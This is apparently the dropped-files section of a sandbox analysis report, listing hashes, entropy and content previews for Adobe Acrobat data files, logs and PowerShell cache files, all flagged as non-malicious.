                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1058
                              Entropy (8bit):5.664787117482739
                              Encrypted:false
                              SSDEEP:24:Yv6XBUrvvT5XInRVmamXayLgEFRcONaqnl0RCmK8czOC+w2E+tg8BkxY:YvEIXeVoBguOAh8cv+NKk
                              MD5:3742D294C1A5A1B3E09135B6980D4C1C
                              SHA1:79C1F82B70DA14653046DCAF99EBC772B53F675A
                              SHA-256:C3D773F492CA9BD724D17E76AB36A00E5CF274B2808F2052132ED996E7E37253
                              SHA-512:77C1177DF172D594BD5512A2558E1421DC364067B2CBAD0675B05E4CC181D7AE510B841967E0914C0402F72FD577B94C0DBE3787A06F3C26B3675FDB03FD881E
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_3","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"ece07729-7db6-4f20-9f8d-7976ad373049","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlNlbmQgZG9jdW1lbnRzICYgZm9ybXNcbmZvciBmYXN0IGUtc2lnbmluZyBvbmxpbmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme"
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):286
                              Entropy (8bit):5.2461376998497915
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJfshHHrPeUkwRe9:YvXKXBUr46vT5LjIPPRVVGUUUkee9
                              MD5:0ABF762225EA3D0ABFEE41235C8A0C56
                              SHA1:FF4539857B67D144C935DBC6650DB710EDA1C518
                              SHA-256:47363D1377A6E23186942B0A3322A7DF8535A524348560645932B1A4F3187135
                              SHA-512:CDA13971ACA40C6CCCC8B3C21D810E8B403345A4937CF57F9E454735EFC259DF95825BE970C16F49A13933A3C9F188DAAAA8FC331BA3279C1ABA8CD68D01134C
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):782
                              Entropy (8bit):5.369470348032538
                              Encrypted:false
                              SSDEEP:24:Yv6XBUrvvT5XInRVx168CgEXX5kcIfANhHx:YvEIXeVx88Cgs5FvR
                              MD5:0D6D3515E1D0F35AAA5D1D10EBC82762
                              SHA1:3BAD8DD825061CE21CFF43CD7328DE4F7AF97E42
                              SHA-256:C08A05EEA5DA59307A31B6A95D155B3E967281C0BFA0D2AE93C521739E4E56B1
                              SHA-512:381DAF07907E4A05CCF6DBDD7550322145A265A0D61520B5869898697E5AF6CC6CDA84B16683EBC126B2E0A96D8FA1DDC3F343B96B85B3F6DA77F1C6706B9C2D
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1724864375123}}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4
                              Entropy (8bit):0.8112781244591328
                              Encrypted:false
                              SSDEEP:3:e:e
                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                              Malicious:false
                              Preview:....
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):2818
                              Entropy (8bit):5.140906652179773
                              Encrypted:false
                              SSDEEP:24:YPp4ClaF1ayKpJ8IlkSvhVy2C35USrcoYOClEyKy499/KmjMExyj0S0Emxh2eRm8:YPGEb1vfeb97+ENHpbxE0JAjGMMo9L6
                              MD5:FB72AF7B6CF77856BD353BD9182C395C
                              SHA1:2F521727785FA144F624FF0E392AC036201C645E
                              SHA-256:2A92A1A17ECAF05831E32B93C5C4B1C7673B2D090F3F7A10A193A83E75BFE212
                              SHA-512:6C2926365E2C02B5DB8157D12FDC4CDC355A3132D416E4CA50DEFD220278645192D25C4E181E58B86C11D2F9F8066FBEE62C83E13E257AC39894CF9E6B699939
                              Malicious:false
                              Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"1f2211a9e4fa69f29ab82972dd8ee743","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1724864374000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"5c172f5f353e0e8f921b9828633fa727","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1058,"ts":1724864374000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"e86a1cc03e57bd5c8ef0362bde9bb03e","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1063,"ts":1724864374000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"b404008bb2bc7dbaf9a1c2059214f978","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1724864374000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"0ceb9923f1be1d0203afd2c13c005980","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1724864374000},{"id":"Edit_InApp_Aug2020","info":{"dg":"b220dfaf6afa08e1140633dbb5659580","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):1.3662117271685479
                              Encrypted:false
                              SSDEEP:24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuZ8cXKdqEKfS8EKfM1baB8cF:Tll2GL7msMcKTlS8fcsuZ8zfIB8w
                              MD5:2987BD6527DD08CC88DE9D96369C6259
                              SHA1:35DBBC12E48D6AFBF5486DB1151F21659231DE4C
                              SHA-256:1EB67BB832A9063935848A8CE7202A944E55B8FC530F930C807D205B71914880
                              SHA-512:D9ED9D6C0589BCB9CA4D20E8D3570020E7FC89A73DB4E352DA1C492C5E51BCDA83F3870ACDDEFDE036193E3E8E1AC713121E6A11A24A60D620DDF60CED3CDF95
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite Rollback Journal
                              Category:dropped
                              Size (bytes):8720
                              Entropy (8bit):1.841839574491547
                              Encrypted:false
                              SSDEEP:24:7+tGZ6bqyKn6ylSTofcNqDuZ8c+KdqEKfS8EKfM1banbqvWqLKufx/XYKQvGJF7M:7MccKTlS8fcsuZ8WfInqGufl2GL7ms4
                              MD5:00EAF8990D210B8D2DE8C1EAB9EAEBE8
                              SHA1:068545589950D55637583D9648FA5C79C2AE0430
                              SHA-256:C0B55C1A454AE331A8F716ADF8BA177B7454E359E123D749D754C6C5778B9672
                              SHA-512:448F4CF83F8991D79C8E59C7CA8F8307A325D37F4C4919929D093CB73BA9B5846B4497900F5655E959633B4C7B79FAFD3E95A437FF98015DF100181EAD0E59BE
                              Malicious:false
                              Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):26604
                              Entropy (8bit):5.0530691163715815
                              Encrypted:false
                              SSDEEP:768:CinHzwiNKe/NZotAHk4VlOdB5cCYoUV3IpNBQkj29YQhjdardFwOkMx:CinHzwiNKeItAHk4VlOdB5cCYoUV3CNX
                              MD5:F368C3BCBBDF0322FD03ADCB0D5E8417
                              SHA1:A0018AC625712EA193C8E22EAC91FBC9A04DA22C
                              SHA-256:C2821B7CA54A82343B049D2DA5C68493CB0D26DA0F3C236AD1EC545E2442B167
                              SHA-512:D6E2B06EEF4FE0FDDDADCE69A785153B2DB77D25D738914521556B6C0497293C49FFD98E85D05C9B3340CA7DF69F0F9A8D775A88861CC92EC1698087DD81F9AC
                              Malicious:false
                              Preview:PSMODULECACHE.(.......z..I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1........Add-MpPreference........Get-MpThreatCatalog........Get-MpThreat........Update-MpSignature........Remove-MpPreference........Get-MpPreference........Get-MpThreatDetection........Set-MpPreference........Get-MpComputerStatus........Start-MpScan........Start-MpWDOScan........Remove-MpThreat.........wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerSh
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulzuUXz:NllUCUX
                              MD5:DFF45826821889930BC215F17F0FDD54
                              SHA1:C5BCD8AF2AE8F74AAB297B9A5E79599699425D0A
                              SHA-256:46163A854FCAA14DA99E6A48486247A9F58816752AF2EA32A6F789ADC2EBC09F
                              SHA-512:EF7FFD9F7F24643156D3422B4CE045ACDEC47E59A1E9F8A09E0D003485A2EA85AD4BDF3AC6905BC69C7DF601378ED55B03C00099727C401B88AE6E8A5F455BFE
                              Malicious:false
                              Preview:@...e.................................".9............@..........
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):246
                              Entropy (8bit):3.5406586576927443
                              Encrypted:false
                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8dA3Cl7l:Qw946cPbiOxDlbYnuRKTCl5
                              MD5:3729117B2C81F8EA2F438141B23ACBDD
                              SHA1:795100E292AF309946B79B90651616CB84E3E704
                              SHA-256:DE0766CFA34CC07D00D6CF2223961250FF0C7809992E9A8E7C330F415EA15CC0
                              SHA-512:6D6B0461EAD983640623BC846E0FF4F1AF88815F58BDD08CCA7CC7B5BB84298F55AE6B57B1450822FFD2D770E91AA09077EF60BCF949C955D64E9AC666FACB60
                              Malicious:false
                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.8./.0.8./.2.0.2.4. . .1.2.:.5.9.:.3.4. .=.=.=.....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                              Category:dropped
                              Size (bytes):144514
                              Entropy (8bit):7.992637131260696
                              Encrypted:true
                              SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                              MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                              SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                              SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                              SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                              Malicious:false
                              Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                              Category:dropped
                              Size (bytes):144514
                              Entropy (8bit):7.992637131260696
                              Encrypted:true
                              SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                              MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                              SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                              SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                              SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                              Malicious:false
                              Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:ASCII text, with very long lines (393)
                              Category:dropped
                              Size (bytes):16525
                              Entropy (8bit):5.330589339471305
                              Encrypted:false
                              SSDEEP:384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
                              MD5:5BC0A308794F062FEC40F3016568DF9F
                              SHA1:14149448191AB45E99011CBBEF39F2A9A03A0D15
                              SHA-256:00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
                              SHA-512:CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
                              Malicious:false
                              Preview:SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15114
                              Entropy (8bit):5.383078394379816
                              Encrypted:false
                              SSDEEP:384:WGs3Uaz7gbSJLFsYrtt8fhgdhyn/WamNCtrB37xdcalMHRS44HZd6t6/OQixh6Sv:w5r
                              MD5:D3573A9150AAFD329CC52DE929029A0B
                              SHA1:6062A422A2EB1737A3AD3932E5FF19AC3002DF25
                              SHA-256:90D5D96D071E9A1005810D5CE449915B59BD929FEC5365BFF46330A2106B5261
                              SHA-512:3409916F3F1FBE3E9D93CB59ADDC26A574203B83F4C559A66149C08CF745929E3B33B345CB4F42EA27FCAE19C4639E126648AB5532DC9144F597867C9EC570EE
                              Malicious:false
                              Preview:SessionID=1b5e96d0-d98f-4cff-b3bd-93d913422c64.1724864367408 Timestamp=2024-08-28T12:59:27:408-0400 ThreadID=3276 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=1b5e96d0-d98f-4cff-b3bd-93d913422c64.1724864367408 Timestamp=2024-08-28T12:59:27:409-0400 ThreadID=3276 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=1b5e96d0-d98f-4cff-b3bd-93d913422c64.1724864367408 Timestamp=2024-08-28T12:59:27:409-0400 ThreadID=3276 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=1b5e96d0-d98f-4cff-b3bd-93d913422c64.1724864367408 Timestamp=2024-08-28T12:59:27:409-0400 ThreadID=3276 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=1b5e96d0-d98f-4cff-b3bd-93d913422c64.1724864367408 Timestamp=2024-08-28T12:59:27:409-0400 ThreadID=3276 Component=ngl-lib_NglAppLib Description="SetConf
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):29752
                              Entropy (8bit):5.394309326509386
                              Encrypted:false
                              SSDEEP:192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmacbeIigcbJ:8qnXopZ50r7iX
                              MD5:9DF5404A4849833552F8B7E0E7228C02
                              SHA1:D2D2543B64F87D26E6A99C906BFE7321D672673F
                              SHA-256:389EE24C917B410D66A5E52F3A15C32DF7BF8BC8E26EAE7428B34391110A296D
                              SHA-512:156820AE742831F7B8C1F8DED3EB587BE47F0392A89EB9086BBB6EFB9D54686B1088A507FCA92C6D68D7CC416D0503A38F341D42E3FED583836D3DF7D8EC426A
                              Malicious:false
                              Preview:05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                              Category:dropped
                              Size (bytes):1419751
                              Entropy (8bit):7.976496077007677
                              Encrypted:false
                              SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                              MD5:95F182500FC92778102336D2D5AADCC8
                              SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                              SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                              SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                              Malicious:false
                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                              Category:dropped
                              Size (bytes):758601
                              Entropy (8bit):7.98639316555857
                              Encrypted:false
                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                              MD5:3A49135134665364308390AC398006F1
                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                              Malicious:false
                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
